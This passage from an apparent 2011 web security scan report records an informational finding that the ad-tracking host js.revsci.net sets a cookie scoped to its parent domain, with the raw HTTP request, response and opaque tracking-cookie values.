rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOUyRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifCVfPuexcffVCxFSIZD4D0KRHTCePMwWm1a/QL52xqqK3/EPC9dJo5cMAsCMtcbvBdYOdIlHxdBPvDuxeR2ZbopTxy48YUKWwuNfnOE7KAS/QDmGjcrpZNsmPVSuCuzNjG0Xbetr+S5JM1eVAJ3kb3z2l2IZ2WW9GHMjjRv0LyiI2Re/jldiPIzrGCJCcSNqPBeDZ6O+7HN8haNHgaKNso1Rq3ye0ai8MGB/IZ9bwsWksL5GelM8UcAObPxVqvDg/XIBAa3KIODy5yQCvagc88BkGk1FceYknE/p+04jZHfCAYzhYK1HEoRIbu3P24j76fStGJq1PLWrOZxygaRIXkRRtltrDaYJDCOQ=; rtc_622X=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU5yOkHFIHZYDJEHWaOW+4wYaiyyY715ckFoFlDXAQEgoeqnG3CUq1eF28RHMrcV0qtaohUjTO3yPCIMPaYnGbhmVSc5VfYij9OMIYKQd6IEV/U7eaOKVrIVUuoozmIGg2QYHf7CkyKF/JXks5veheEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxCr0dOcOdWfBETSZ5j8rCSuegYPLLWDcPlCLSDoScLh4z5LS4irvuWTxzQqieFTIm02czO7dpwSpf2Y03EuikRKLvIQ54HXIZiXFRPHQ+5fNwzySL2dIvUlQvXsMV1c7MlCYCi+fiGdsiNsHNxHVjX8mas8pgfv2ttYG+R5Eg+ThssuvXjIsc1pVES5xcei65xpvTqTJaydwuZ9kxQ5keTeT1tnFtzpwFdZ8U8GECM54dZrQOemERZaGGIdE0y1HTZTwX48tMHCOtiJHmt3yea4FtR/slYBWdCdCAo1Nm6994UlxsgpWDUNgaHw5bycN5/By3TFwX+jrP8dD+oaWZJ8AJL0UK7e2pDV0vceBeayTLoc9lBQ+P3ZqQwLxTRawPc5ca2Q95/KGyQGdIN4xMvc2lY7fC7DMX+HCQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:24:22 GMT; Path=/
X-Proc-ms: 0
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 142
Date: Thu, 16 Jun 2011 11:24:21 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'unk');}

10.66. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBZs66O2VJ8nVhNNNA7LZsKuuAdRuhry5GdSvQAU1GrEi6UrT031s4JkwQXEb8iMDPHlQXvF2uv5OIusuoi2sbvsqxUqk1VHa83DvyOqZvgWqVxmcWIamC8nXWAIxqsezSe9oa5Vy/39rYVS1FgBxQvTCIiMa+1j8IL4+DjF7YsXO0HH0P2m2BTTsqddAWCMGLPLh+9Cs9xqVbfqx7zH1UcAcqLfUKR70nAS6SB+1Mh0bs5npya/B4+7GDnx8HBkvUi+ouzwsZmH0fQIXYZ5ZcsMxeA+iWTJiRwNpXgkDESmSMqOEZF59Ut9jwiQU11yXCG8iFmI2XUdPD0H8ErsVwgA9biYW5Yj3NVVCkvoEaq43d16SUggpvN8g/AFXH15SbwW7X9gjbPGS9RIENjX6rn9tQMgTqBUTiqF16lrWksHSvZqvitgEQSz3RWRhZBIdzIiqo4/JObC7ZHHBzgvGV/OgaatwL0I0OTsTQqkcyonrPn7KuBJ6I1XFRCgHp4dLUVnHL6uJVK1GTCxQfuuXlrQKXUFuef2oQMC8EYT57CseI2qqj9oxzUSU5ywdq4HoeLXnUO8eYXAY53K1pk5HZtpJ+v00a6NY+CsVg7bLaPy/d2DpcEJFWPqMnlti4nmKcrgKdxUBx/kK9iokVycpba8A/2rez9ysp/+AyFOD1FTgfGzaXlR5ruBZt86DBa4C81/AGN8KKoSigo7EovtmqRc3N0JF8EFYFOKigdpyYtQaoowobd8Rroom9yZ2LHSRJxryuWonCs3lsDwHnMMnjM1eXX8T0PrzQogtKydVuWTdGAIs28/W1jJOqA8JukiohsPhNhmelK4zWXHCr+sIOb9MSIe7t8zo2wsA3Oa1L++Xy8vQHbc+gZSvjKaIBdqoq8+4h5Hbk4nV2bX9HHyoUVGZqXawGuQLDyjLdWy4IeDra0J3uKuS9pPwIsigk/Pxfzj5rxyVDvwfLvBEjwcENcKRMTjiJnlQTQ7HIk3OkhZWQLD+ANAbGec6CQkywZ0ZGs0xSOWq8c3M3wd4HVwbqvfguMbjWwqWPEhOIeKf30NqRKhrmUnw/FklhU+qb67/ZUArmuo1UqXBEY+He0Ddh9j19YLh5AUJqa8a7pECW2xwiDzd4kZcs0qizk2lFijcP1fCQ6Azo7mx9hrba4+LZ/pE4vbfPSSvVVdWH07GR24Vw53yUvTfyra9ld5weXosVyVsa+AZYYAnVicha4hTRKyFfJD9dV6uLKI3FIBpJTsYzqHpIIvfpO4WXe0Nvo0HXgWikO2safFF2xECLaSEgk8QYc0uBVmy3lHR3SKCeGRx4S0xKCdHlbbY7cNMryPWK771UVOGSQpjoLyvm3/uFXZvd6QE8fkxEuJ9SzbrrOQxSWC4avatQ17yMlYzj+l9+rVEqQNUYc4lrNZVAaTdUyIyY99yoNuAyx9sqFaQw3tzvE1dzRUXprIhlbOwLtkSTuMNJzIlxtpOEMHmZrsyHxDJldOymIcSEAikUgk3wN9vp6O7gelgk3x581ZUT7Htb1tASL4XJh1P8lc8yvfgx773aOBJvbuFs+vu1XaE85OCKKmkLkgABwiaNW6h2qHai5o8W+h1i8kBw4D/8fpLGhFE5ObkFCwLlo2Nh58cjpMBai3a2SC75wIjc0XlZGXet2KAkdt9w/6KF4AAbPiVaDb8HX5LOQMzfk1mCXsJd2a/D2t0InE4Y/UHMiQHFSctcrNuS9u57VHqfpJtPnAAFm+p+QgzKIngJb+TMyIy9OrgWMDYF5mYTdV+gSxfrVo7MepKYjVxewZSUXpZIPC6wOhpPUBa3iNIeUpY8H8Ti5KJZfpNYNdYa2U5f5n9CeXcEQTjBndgqQNcnmGQn4sn; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLvvNzMJZjpnHtrXN5qKIO+EM5z5agvMeBQJyB/E+z0r03k+Hy5oZ++Kg6mfGblUj57YR9HJ4U08Ynvq8C709kgjf+lOrStTYCbr/angppkIGSOkPPAp/mypKNZbjcB72v/jlVFJmIjOFrxYR4kFS17wMqCDVOPoO/NliIQixDmzoM2F1CkrGVjf4TNCnwMD1vr40K3uB3N33JQLdidrN+E9QkSn6qtaTPH5RnuEJ3mzJ9t2p3TRwWBNid2On9+fUJyTz30R2aORRA0UfqPScHlRLqFTcoQm40NzTqj+/2Vy5VSXRWGSc27JMDcd8UNgaC0BO18gVnBFnQ6+jpUwnwfHMfBWHtTJvx1HIhpaKtfGBxyV+ES3D1XCQTpUbiMJRE32Ktb+m+c0zKY6N35B0CY6xaxUeUTS6CmxVOtONznG42bm7Cp73/0XB7cUbyNLzX6uKi3zPpyRn5e7qRqkr+Vz7xZncif6W33yar0JjnbGu2N47Pwzcm7HwtAIRfE5V0yxwy/3qMnCThiEl84VQAzlm2xUbzWX8IPzExoEMfF+yzSX56mKClUyzrAdhMb4SzA+ThPGTPslDr+gIzSHG03Ux1LnaLbAYfDlU+6tMXaZNvWWPKTxTFz4ICyohFWBdQH8T2/2zd3Rh9qtIm3SYCAThcJNcDZIE5O42lw95s+a3fJrJPgR8Muuxs0SjbTsP3hghX02EHvyFysd2bbECslVMLrdpk4xBa1ZLO7ZeuPl3I6BKWjMCpKwQeVEdjD2N0/Hey+2XjLSol7KGlWXwmIZwnxM31au1EPUwG82Ub8DOfzXwbmFN7m7dp1GFIrihpAsr+NYHZmoA/Cz6Wq1dHaQuqwZXr7l0g8z+AqPwnJyigXx1ybKbx+2/f+QNvo+kk6TCYcZelBtmDGAEIuvyivhZFjqgH9+L+hKu4dDNZ0IEzhvR/Oqf86/1RHrRV46lhrwOxyNhZx7hIKCTaeahRNFnt5g7RgzN6KqqB6674vIMWTvfgG7cYXsM2rrEk/CzN62KGFg735e56rGI4iMox3LUac+9A5CVIj/dyNwQa5bI3zR2pecGRfc17HQ3mNNQyOtTIwLN1dmPMmdpcJimepeI2r+OvMy5/1tlEvFpiwpAVPI1+Z4cyHXCEBN/x4pmz9VrhKlIKa/udFMHuwQkj74k9CbECtFv0QC1+Sa2hUSCO5fa/rSjP9yX5uPpQFsaggKqwSpw//kWvk8tvD3pywQ9BBmsdFCXm74ltkGZtHSu+p4wrwRZH2oHP9B96bjFejkxT7/PHehmAG0v/wo2RIdMNgTgJpVwlHKx3kDOhhGprNjp0VsqRhMr3gmihVy/J0eptWVkGRN4cjbebh9RX11SGgDuH4CNnBRtu+iSfhX6MElzezQU+WLL0BJWr1QOzAaQ8dGB1ecqpMlPCAadwUsHBNeAcuZjL9O8BRFfoHQ/xIwA2eEEi5oVNP1ehj8G+QqdKYyvs6LIuwyeaY6lHfRl7hnmRrf/BhLV3s3qZ0+uFCAIlYlGTDwZyr9CxDXNm2t2+HL3MFvNzD7K1dKiBNpeBWl3GhZTcQ7n6S/EstIeQhBTfLVklV8DW+TnKM/3RR9Csqcr9I9eSY9Yn9cA+fYhYaIJeE3SgkMU6hxuUgWgN83Xp5Ze+MiFR1YqDF8gmdiJ+kil4tjFpSMeN+i09MYNT6tglwjwDIly+9CahdX8PB3GjIhAQd/YZ5Yu2AsX6VgsmuDDrnMhH0t/a0A1n2RYrVnHQosOVtU+tNgYMjX0Ugy+FpLChRmW8p9uv52zQWvIm1mQNZkNAJSWykdMycOxsZ+8nAulTJFe3Rg8GnAZBEHZ+fl8vSPQEjlc3uzttwlEBou/ICBay1z6otJLWip3g==; rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOU